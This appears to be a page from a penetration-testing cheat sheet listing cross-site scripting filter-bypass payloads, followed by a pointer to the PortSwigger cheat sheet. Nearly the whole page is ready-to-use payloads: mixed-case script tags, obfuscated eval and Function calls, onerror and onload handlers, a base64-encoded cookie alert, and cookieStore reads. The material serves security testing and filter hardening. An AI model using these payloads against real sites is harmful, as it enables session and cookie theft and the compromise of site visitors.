Skip to main content

Cross-Site Scripting (XSS)

Basic Bypass List

<sCrIpt>alert(1)</ScRipt>
<script x>
<script x>alert('XSS')<script y>
<script x><script x>alert('XSS')<script y>
eval('ale'+'rt(0)');Function("ale"+"rt(1)")();new Function`al\ert\`6\``;setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;
<img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
http://localhost/bla.php?test=</script><script>alert(1)</script><html>  <script>    <?php echo 'foo="text '.$_GET['test'].'";';`?>  </script></html>
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])</script>
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
alert`1`setTimeout`alert\u0028document.domain\u0029`;
<img/src='1'/onerror=alert(0)>
<svg
    onload
          =
           alert(1)
                   >
"><svg/onload=confirm(1)>"@x.y
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>window["doc"+"ument"]
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
<script>foo="text </script><script>alert(1)</script>";</script>
<svg onload=alert(1)//
\\\';alert(1);//
&apos;-alert(1)-&apos;
${alert(document.domain)}
<><img src=1 onerror=alert(1)>

Port Swigger Cheat Sheet

Cheat Sheet